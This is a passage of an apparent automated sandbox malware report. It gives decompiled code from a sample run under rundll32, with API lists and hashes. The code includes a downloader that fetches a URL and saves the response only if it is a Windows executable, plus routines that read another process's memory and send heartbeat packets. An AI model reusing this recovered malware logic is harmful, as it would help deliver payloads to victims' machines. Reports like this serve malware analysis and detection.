                                                            					// the call and the compare of a constant against -1 (SOCKET_ERROR)
                                                            					// are decompiler artifacts of the low-quality recovery.
                                                            					__imp__#4( *(_t140 + 0x88), _t120, 0x10);
                                                            					__eflags = 0x10 - 0xffffffff;
                                                            					if(0x10 == 0xffffffff) {
                                                            						__imp__#111(); // ws2_32 ordinal 111 = WSAGetLastError
                                                            						goto L15;
                                                            					} else {
                                                            						_t92 =  &_v12;
                                                            						_v12 = 1;
                                                            						// ws2_32 ordinal 10 = ioctlsocket(s, FIONBIO, &1): non-blocking mode
                                                            						__imp__#10( *(_t140 + 0x88), 0x8004667e, _t92);
                                                            						__eflags = _t92;
                                                            						if(_t92 != 0) {
                                                            							goto L22;
                                                            						} else {
                                                            							_t103 = CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t92);
                                                            							__eflags = _t103;
                                                            							if(_t103 == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t140 + 0x48)) = 1;
                                                            								_t104 = E046520F0(_v24, _t140);
                                                            								__eflags = _t104 - 2;
                                                            								if(_t104 == 2) {
                                                            									_t105 = GetLastError();
                                                            									__eflags = _t105;
                                                            									_t85 =  ==  ? 0x4c7 : _t105; // 0x4c7 = ERROR_CANCELLED when no last error is set
                                                            									goto L15;
                                                            								} else {
                                                            									_t85 = E04653AC0(_t115, _v24, _t140, _t144, _t140, _t115);
                                                            									_t121 = 0;
                                                            								}
                                                            							}
                                                            							goto L16;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t106 =  &_v16;
                                                            					_v16 = 1;
                                                            					// ws2_32 ordinal 10 = ioctlsocket(s, FIONBIO = 0x8004667e, &1): put the
                                                            					// socket into non-blocking mode before binding it to the completion port
                                                            					__imp__#10( *(_t140 + 0x88), 0x8004667e, _t106);
                                                            					if(_t106 != 0) {
                                                            						_push(0x80004005); // E_FAIL
                                                            						E04637AC0(); // fail-fast helper: raises 0xC000001D (STATUS_ILLEGAL_INSTRUCTION), see APIs below
                                                            						L22:
                                                            						E04637AC0();
                                                            						// int3 padding: from here to the return that follows, the
                                                            						// decompiler has appended the beginning of the next function.
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_t150 = _t151;
                                                            						_t94 =  *0x4684008; // 0xd355be4e
                                                            						_v68 = _t94 ^ _t150;
                                                            						_t135 = _v44;
                                                            						__eflags = _t135;
                                                            						_t146 = _v52;
                                                            						_v76 = _v48;
                                                            						_t98 =  ==  ? _t146 : _t146 + _t135;
                                                            						_v72 =  ==  ? _t146 : _t146 + _t135;
                                                            						 *((intOrPtr*)( *_t120 + 8))( &_v76, 1, _t144, _t149, 0x80004005);
                                                            						__eflags = _v68 ^ _t150;
                                                            						return E04655AFE(_v68 ^ _t150, _v56);
                                                            					} else {
                                                            						if(CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t106) == 0) {
                                                            							L7:
                                                            							_t85 = GetLastError();
                                                            						} else {
                                                            							_t85 = E0464D560( *((intOrPtr*)(_v24 + 0x40)),  *(_t140 + 0x88), _v28, _t115);
                                                            						}
                                                            						L15:
                                                            						_t121 = 1;
                                                            						L16:
                                                            						_v20 = _t85;
                                                            						if(_t85 != 0 && _t121 != 0) {
                                                            							E04652920(_v24, _t140, 0, 0, 0);
                                                            							_t89 = E0464C930(_v24 + 0xb0, _t115);
                                                            							if(_t89 == 0) {
                                                            								HeapFree( *( *(_t115 + 0x14)), _t89, _t115);
                                                            							}
                                                            						}
                                                            						LeaveCriticalSection(_t144);
                                                            						return E04655AFE(_v8 ^ _t149);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 046540E6
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04654135
                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 0465416D
                                                            • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 04654189
                                                            • GetLastError.KERNEL32 ref: 046541B0
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04654291
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04654298
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorHeapLastLeave$AllocateCompletionCreateExceptionFreePortRaiseioctlsocket
                                                            • String ID:
                                                            • API String ID: 421389320-0
                                                            • Opcode ID: 0eca43ede923c301dbaaefb1f5184153f29a43537a249420d810a8911f32d341
                                                            • Instruction ID: 0fc50af96303e15cbea70d29c4ce6ce505caefa43dfef27601ab1964ee6ed225
                                                            • Opcode Fuzzy Hash: 0eca43ede923c301dbaaefb1f5184153f29a43537a249420d810a8911f32d341
                                                            • Instruction Fuzzy Hash: 95713C71A00209EFDB14DFA5D884BAEBBB9FF48304F104159E915E7260EF71A990DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E04635DA0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v32;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				char _v84;
                                                            				intOrPtr _v976;
                                                            				intOrPtr _v980;
                                                            				signed int _v988;
                                                            				char _v1100;
                                                            				intOrPtr _v1968;
                                                            				intOrPtr _v1972;
                                                            				char _v2004;
                                                            				intOrPtr _v2008;
                                                            				char _v2012;
                                                            				intOrPtr _v2016;
                                                            				signed int _t58;
                                                            				struct HINSTANCE__* _t60;
                                                            				struct HINSTANCE__* _t62;
                                                            				signed int _t83;
                                                            				intOrPtr* _t107;
                                                            				intOrPtr _t127;
                                                            				intOrPtr* _t129;
                                                            				intOrPtr* _t131;
                                                            				intOrPtr _t132;
                                                            				void* _t133;
                                                            				signed int _t134;
                                                            				intOrPtr _t154;
                                                            				intOrPtr _t101; // used below as _v16 + 1 but missing from the decompiler's locals
                                                            
                                                            				_t58 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t58 ^ _t134;
                                                            				_v2016 = __edx;
                                                            				_t129 = __ecx;
                                                            				_t60 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t60 != 0) {
                                                            					L3:
                                                            					_t131 = GetProcAddress(_t60, "NtWow64QueryInformationProcess64");
                                                            				} else {
                                                            					_t60 = LoadLibraryA("ntdll.dll");
                                                            					if(_t60 != 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t131 = 0;
                                                            					}
                                                            				}
                                                            				_t62 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t62 != 0) {
                                                            					L7:
                                                            					_t107 = GetProcAddress(_t62, "NtWow64ReadVirtualMemory64");
                                                            				} else {
                                                            					_t62 = LoadLibraryA("ntdll.dll");
                                                            					if(_t62 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						_t107 = 0;
                                                            					}
                                                            				}
                                                            				if(_t131 == 0 || _t107 == 0) {
                                                            					 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                            					 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                            					 *_t129 = 0;
                                                            					E046332A0(_t129, 0x467c5d0);
                                                            					__eflags = _v8 ^ _t134;
                                                            					return E04655AFE(_v8 ^ _t134, 0);
                                                            				} else {
                                                            					E0465DEA0(_t129,  &_v84, 0, 0x30);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movlpd [ebp-0x7d8], xmm0");
                                                            					_push( &_v2012);
                                                            					_push(0x30);
                                                            					_push( &_v84);
                                                            					_push(0);
                                                            					_push(_v2016);
                                                            					if( *_t131() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                            						L24:
                                                            						E046331B0(_t129, _t129, 0x467c5d0);
                                                            						__eflags = _v8 ^ _t134;
                                                            						return E04655AFE(_v8 ^ _t134);
                                                            					} else {
                                                            						_t132 = _v2016;
                                                            						_push( &_v2012);
                                                            						_push(0);
                                                            						_push(0x388);
                                                            						_push( &_v2004);
                                                            						_push(_v72);
                                                            						_push(_v76);
                                                            						_push(_t132);
                                                            						if( *_t107() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                            							goto L24;
                                                            						} else {
                                                            							_push( &_v2012);
                                                            							_push(0);
                                                            							_push(0x3f8);
                                                            							_push( &_v1100);
                                                            							_push(_v1968);
                                                            							_push(_v1972);
                                                            							_push(_t132);
                                                            							if( *_t107() < 0 || _v2012 != 0x3f8) {
                                                            								goto L24;
                                                            							} else {
                                                            								_t154 = _v2008;
                                                            								if(_t154 != 0) {
                                                            									goto L24;
                                                            								} else {
                                                            									_t83 = (_v988 & 0x0000ffff) + 1;
                                                            									_t133 = L04655B55( ~(_t154 > 0) | _t83 * 0x00000002, _t132, _t154);
                                                            									E0465DEA0(_t129, _t133, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                            									asm("cdq");
                                                            									 *_t107(_v2016, _v980, _v976, _t133, _v988 & 0x0000ffff, _t83 * 2 >> 0x20,  &_v2012,  ~(_t154 > 0) | _t83 * 0x00000002);
                                                            									E046331B0( &_v32, _t129, _t133);
                                                            									L04655B0F(_t133);
                                                            									 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                            									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                            									 *_t129 = 0;
                                                            									_t127 = _v12;
                                                            									if(_t127 >= 8) {
                                                            										 *_t129 = _v32;
                                                            										_v32 = 0;
                                                            									} else {
                                                            										_t101 = _v16 + 1;
                                                            										if(_v16 + 1 != 0) {
                                                            											E0465D060(_t129,  &_v32, _t101 + _t101);
                                                            											_t127 = _v12;
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t129 + 0x10)) = _v16;
                                                            									 *((intOrPtr*)(_t129 + 0x14)) = _t127;
                                                            									_v12 = 7;
                                                            									_v16 = 0;
                                                            									_v32 = 0;
                                                            									E04633170( &_v32);
                                                            									return E04655AFE(_v8 ^ _t134);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            0x04635da9
                                                            0x04635db0
                                                            0x04635dbb
                                                            0x04635dc1
                                                            0x04635dc3
                                                            0x04635dd1
                                                            0x04635de2
                                                            0x04635dee
                                                            0x04635dd3
                                                            0x04635dd8
                                                            0x04635ddc
                                                            0x00000000
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635ddc
                                                            0x04635df5
                                                            0x04635dfd
                                                            0x04635e0e
                                                            0x04635e1a
                                                            0x04635dff
                                                            0x04635e04
                                                            0x04635e08
                                                            0x00000000
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e08
                                                            0x04635e1e
                                                            0x04636021
                                                            0x04636029
                                                            0x04636037
                                                            0x0463603a
                                                            0x04636046
                                                            0x04636051
                                                            0x04635e2c
                                                            0x04635e34
                                                            0x04635e42
                                                            0x04635e45
                                                            0x04635e4d
                                                            0x04635e4e
                                                            0x04635e53
                                                            0x04635e54
                                                            0x04635e56
                                                            0x04635e60
                                                            0x04636000
                                                            0x04636007
                                                            0x04636014
                                                            0x0463601e
                                                            0x04635e80
                                                            0x04635e80
                                                            0x04635e8c
                                                            0x04635e8d
                                                            0x04635e8f
                                                            0x04635e9a
                                                            0x04635e9b
                                                            0x04635e9e
                                                            0x04635ea1
                                                            0x04635ea6
                                                            0x00000000
                                                            0x04635ec9
                                                            0x04635ecf
                                                            0x04635ed0
                                                            0x04635ed2
                                                            0x04635edd
                                                            0x04635ede
                                                            0x04635ee4
                                                            0x04635eea
                                                            0x04635eef
                                                            0x00000000
                                                            0x04635f05
                                                            0x04635f05
                                                            0x04635f0c
                                                            0x00000000
                                                            0x04635f12
                                                            0x04635f1b
                                                            0x04635f30
                                                            0x04635f44
                                                            0x04635f5a
                                                            0x04635f70
                                                            0x04635f76
                                                            0x04635f7c
                                                            0x04635f83
                                                            0x04635f8a
                                                            0x04635f94
                                                            0x04635f97
                                                            0x04635f9d
                                                            0x04635fbf
                                                            0x04635fc1
                                                            0x04635f9f
                                                            0x04635fa2
                                                            0x04635fa5
                                                            0x04635faf
                                                            0x04635fb4
                                                            0x04635fb7
                                                            0x04635fa5
                                                            0x04635fcd
                                                            0x04635fd3
                                                            0x04635fd6
                                                            0x04635fdd
                                                            0x04635fe4
                                                            0x04635fe8
                                                            0x04635fff
                                                            0x04635fff
                                                            0x04635f0c
                                                            0x04635eef
                                                            0x04635ea6
                                                            0x04635e60

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DC3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635DD8
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04635DE8
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DF5
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635E04
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04635E14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                            • API String ID: 310444273-3583746680
                                                            • Opcode ID: 044b83255e56ab32826ba3cb4c52e3725616e84b02416b1761f35afa97d3ab1a
                                                            • Instruction ID: 449cc427c2db81297be0342c84474cdcb8c2e418602546350a07ce259949311f
                                                            • Opcode Fuzzy Hash: 044b83255e56ab32826ba3cb4c52e3725616e84b02416b1761f35afa97d3ab1a
                                                            • Instruction Fuzzy Hash: B0618971E00359ABDB619F64DC45BAEB7B8EF44305F4000AAE909E6240FB78BE44CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E04645750(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v1032;
                                                            				char _v1033;
                                                            				long _v1040;
                                                            				WCHAR* _v1044;
                                                            				long _v1048;
                                                            				void* _v1052;
                                                            				signed int _t21;
                                                            				void* _t45;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				struct _OVERLAPPED* _t56;
                                                            				signed int _t58;
                                                            				void* _t59;
                                                            
                                                            				_t21 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t21 ^ _t58;
                                                            				_v1044 = __edx;
                                                            				_v1040 = 0;
                                                            				_t56 = 1;
                                                            				_v1048 = 0;
                                                            				_v1033 = 1;
                                                            				_t53 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0);
                                                            				_v1052 = _t53;
                                                            				if(_t53 == 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t58);
                                                            				} else {
                                                            					_t45 = InternetOpenUrlW(_t53, __ecx, 0, 0, 0x80000000, 0);
                                                            					if(_t45 != 0) {
                                                            						_t54 = CreateFileW(_v1044, 0x40000000, 0, 0, 2, 0, 0);
                                                            						if(_t54 != 0xffffffff) {
                                                            							while(1) {
                                                            								E0465DEA0(_t54,  &_v1032, 0, 0x400);
                                                            								_t59 = _t59 + 0xc;
                                                            								InternetReadFile(_t45,  &_v1032, 0x400,  &_v1040);
                                                            								if(_t56 != 0 && _v1032 != 0x5a4d) {
                                                            									break;
                                                            								}
                                                            								_t56 = 0;
                                                            								WriteFile(_t54,  &_v1032, _v1040,  &_v1048, 0);
                                                            								if(_v1040 > 0) {
                                                            									continue;
                                                            								} else {
                                                            								}
                                                            								L10:
                                                            								CloseHandle(_t54);
                                                            								goto L11;
                                                            							}
                                                            							_v1033 = 0;
                                                            							goto L10;
                                                            						}
                                                            						L11:
                                                            						InternetCloseHandle(_t45);
                                                            						InternetCloseHandle(_v1052);
                                                            						return E04655AFE(_v8 ^ _t58);
                                                            					} else {
                                                            						InternetCloseHandle(_t53);
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0464579B
                                                            • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 046457BA
                                                            • InternetCloseHandle.WININET(00000000), ref: 046457C7
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 046457F5
                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 0464582C
                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0464585C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04645874
                                                            • InternetCloseHandle.WININET(00000000), ref: 04645881
                                                            • InternetCloseHandle.WININET(?), ref: 04645889
                                                            Strings
                                                            • Mozilla/4.0 (compatible), xrefs: 0464576E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                            • String ID: Mozilla/4.0 (compatible)
                                                            • API String ID: 769820311-4055971283
                                                            • Opcode ID: 71bd387b3cd2245ea283c9a6054370097ba22fcb509cd915e3f517ad8f5f7fe4
                                                            • Instruction ID: 9b977cf094de733101171050f99923716c33e4079da4927d30fb5b9cc41a46fd
                                                            • Opcode Fuzzy Hash: 71bd387b3cd2245ea283c9a6054370097ba22fcb509cd915e3f517ad8f5f7fe4
                                                            • Instruction Fuzzy Hash: 3331ABB1A00218BBEB309B549C49FAEB778DB44B14F1041E5F709B61C1FB746D858F99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E04636530() {
                                                            				struct HINSTANCE__* _t1;
                                                            				_Unknown_base(*)()* _t2;
                                                            				struct HINSTANCE__* _t3;
                                                            				_Unknown_base(*)()* _t6;
                                                            				struct HINSTANCE__* _t15;
                                                            
                                                            				_t1 = LoadLibraryA("User32.dll");
                                                            				_t15 = _t1;
                                                            				if(_t15 != 0) {
                                                            					_t2 = GetProcAddress(_t15, "SetProcessDpiAwarenessContext");
                                                            					if(_t2 == 0) {
                                                            						L4:
                                                            						_t3 = LoadLibraryA("Shcore.dll");
                                                            						if(_t3 == 0) {
                                                            							L8:
                                                            							if(GetProcAddress(_t15, "SetProcessDPIAware") != 0) {
                                                            								goto __eax;
                                                            							}
                                                            							return 0;
                                                            						} else {
                                                            							_t6 = GetProcAddress(_t3, "SetProcessDpiAwareness");
                                                            							if(_t6 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								_push(2);
                                                            								if( *_t6() == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									goto L7;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_push(0xfffffffd);
                                                            						if( *_t2() != 0) {
                                                            							L7:
                                                            							return 1;
                                                            						} else {
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					return _t1;
                                                            				}
                                                            			}

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(User32.dll,?,046365E3), ref: 04636536
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 04636551
                                                            • LoadLibraryA.KERNEL32(Shcore.dll,?,?,046365E3), ref: 04636564
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 04636574
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                            • API String ID: 2574300362-2252252969
                                                            • Opcode ID: 629c23b8c2f4d7566d58f033024548b7d5d8ec4c00975bf53fdba612a9b3ad8f
                                                            • Instruction ID: 98472c043b25dcc65f85b477633ffb1791c46de7d2c532c55cd3fdf28cdfce9b
                                                            • Opcode Fuzzy Hash: 629c23b8c2f4d7566d58f033024548b7d5d8ec4c00975bf53fdba612a9b3ad8f
                                                            • Instruction Fuzzy Hash: E8F03632349353769B31657EFC09E9A27486FF0A767050631F415D5198FE84EE4248B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04651DE0(intOrPtr __ecx) {
                                                            				intOrPtr _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				void* __esi;
                                                            				void* _t44;
                                                            				long _t45;
                                                            				short* _t51;
                                                            				void* _t54;
                                                            				signed int _t57;
                                                            				intOrPtr _t63;
                                                            				intOrPtr _t69;
                                                            				signed int _t70;
                                                            				signed int _t71;
                                                            				intOrPtr _t80;
                                                            				signed int _t82;
                                                            				struct _CRITICAL_SECTION* _t93;
                                                            
                                                            				_t63 = __ecx;
                                                            				_v16 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
                                                            					_t93 = __ecx + 0x28;
                                                            					EnterCriticalSection(_t93);
                                                            					__eflags =  *(_t63 + 0x24);
                                                            					if( *(_t63 + 0x24) != 0) {
                                                            						_t82 = timeGetTime();
                                                            						_v12 = _t82;
                                                            						_v8 =  *((intOrPtr*)(_t63 + 0x18));
                                                            						__eflags = _t82;
                                                            						if(_t82 == 0) {
                                                            							_v12 = timeGetTime();
                                                            						}
                                                            						_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 + 4)))) + 0x54))();
                                                            						__eflags = _v12 - _v8 - _t44;
                                                            						if(_v12 - _v8 <= _t44) {
                                                            							_t69 =  *((intOrPtr*)(_t63 + 0x10));
                                                            							_t45 = _t82;
                                                            							_v8 = _t69;
                                                            							__eflags = _t82;
                                                            							if(_t82 == 0) {
                                                            								_t45 = timeGetTime();
                                                            								_t69 = _v8;
                                                            							}
                                                            							__eflags = _t45 - _t69;
                                                            							if(_t45 - _t69 >= 0) {
                                                            								_t80 =  *((intOrPtr*)(_t63 + 0x40));
                                                            								 *(_t63 + 0x14) =  *(_t63 + 0x14) + 1;
                                                            								_t70 =  *(_t63 + 0x14);
                                                            								__eflags =  *(_t80 + 0x50) * _t70 - 0x7d0;
                                                            								if(__eflags >= 0) {
                                                            									_t71 = 0x7d0;
                                                            								} else {
                                                            									_t21 = _t70 + 1; // 0x1
                                                            									_t57 = _t21;
                                                            									 *(_t63 + 0x14) = _t57;
                                                            									_t71 =  *(_t80 + 0x50) * _t57;
                                                            								}
                                                            								 *((intOrPtr*)(_t63 + 0x10)) = _t71 + _t82;
                                                            								_push(0xc);
                                                            								_v8 =  *((intOrPtr*)(_t63 + 0x20));
                                                            								_t51 = L04655B55(_t71, _t93, __eflags);
                                                            								_v12 = _t51;
                                                            								__eflags =  *(_t63 + 0x24) - 2;
                                                            								 *_t51 = 0xbb4f;
                                                            								 *((char*)(_t51 + 3)) = 0xbb00 |  *(_t63 + 0x24) == 0x00000002;
                                                            								 *((char*)(_t51 + 2)) = 1;
                                                            								 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t63 + 0x1c));
                                                            								 *((intOrPtr*)(_t51 + 8)) = _v8;
                                                            								LeaveCriticalSection(_t93);
                                                            								asm("sbb ecx, ecx");
                                                            								__eflags =  ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004;
                                                            								_t54 = E0464E940( ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004, _v12, 0xc, 0);
                                                            								L04655B0F(_v12);
                                                            								return _t54;
                                                            							} else {
                                                            								LeaveCriticalSection(_t93);
                                                            								return 1;
                                                            							}
                                                            						} else {
                                                            							SetLastError(0x5b4);
                                                            							__eflags = 0;
                                                            							LeaveCriticalSection(_t93);
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						SetLastError(0x139f);
                                                            						__eflags = 0;
                                                            						LeaveCriticalSection(_t93);
                                                            						return 0;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				}
                                                            			}

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651DF7
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04651E0A
                                                            • SetLastError.KERNEL32(0000139F), ref: 04651E1B
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651E24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: c6c940918f050573eedad1bd29eab23298cb7b07a53c5ec7797b7937ab806c75
                                                            • Instruction ID: 10cabc136924b9ee9feb0b5ea04cf445ff9d3ab94166fc4d71c041f9e00939ca
                                                            • Opcode Fuzzy Hash: c6c940918f050573eedad1bd29eab23298cb7b07a53c5ec7797b7937ab806c75
                                                            • Instruction Fuzzy Hash: C1416176A00204DFCB08DFA9D588A99BBB9FF89311F1541A9DD09DB341EB35E901CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0463DF10(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                            				intOrPtr _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t21;
                                                            				void* _t22;
                                                            				int _t27;
                                                            				int _t34;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				void* _t48;
                                                            				void* _t52;
                                                            				void* _t58;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            				void* _t70;
                                                            				void* _t74;
                                                            				intOrPtr* _t78;
                                                            				void* _t79;
                                                            
                                                            				_push(__ecx);
                                                            				_push(_t67);
                                                            				_t58 = _a8;
                                                            				_t39 = __ecx;
                                                            				_v8 = __ecx;
                                                            				if(_t58 != 0) {
                                                            					_t78 = _a4 + 8;
                                                            					_t66 = (_t58 - 1 >> 4) + 1;
                                                            					do {
                                                            						E0463DE60(__ecx,  *((intOrPtr*)(_t78 - 8)),  *((intOrPtr*)(_t78 - 4)),  *_t78,  *((intOrPtr*)(_t78 + 4)));
                                                            						_t79 = _t79 + 8;
                                                            						_t78 = _t78 + 0x10;
                                                            						_t66 = _t66 - 1;
                                                            					} while (_t66 != 0);
                                                            				}
                                                            				Sleep(0x64);
                                                            				_t21 =  *((intOrPtr*)(_t39 + 0xc));
                                                            				if(_t21 != 2) {
                                                            					__eflags = _t21 - 3;
                                                            					if(__eflags != 0) {
                                                            						_t22 = L0463DB90(_t39, __eflags);
                                                            						goto L10;
                                                            					} else {
                                                            						_t22 = E0463D980(_t58, _t67);
                                                            						_a8 = _t22;
                                                            						__eflags = _t22;
                                                            						if(_t22 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t16 = LocalSize(_t22) + 1; // 0x1
                                                            							_t41 = LocalAlloc(0x40, _t16);
                                                            							_t70 = _a8;
                                                            							_t18 = _t41 + 1; // 0x1
                                                            							_t48 = _t18;
                                                            							 *_t41 = 0x8e;
                                                            							E0465E060(_t48, _t70, _t23);
                                                            							LocalFree(_t70);
                                                            							_t27 = LocalSize(_t41);
                                                            							_push(_t48);
                                                            							_push(0x3f);
                                                            							_push(_t27);
                                                            							_push(_t41);
                                                            							E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            							return LocalFree(_t41);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t22 = E0463D570(_t58, _t67);
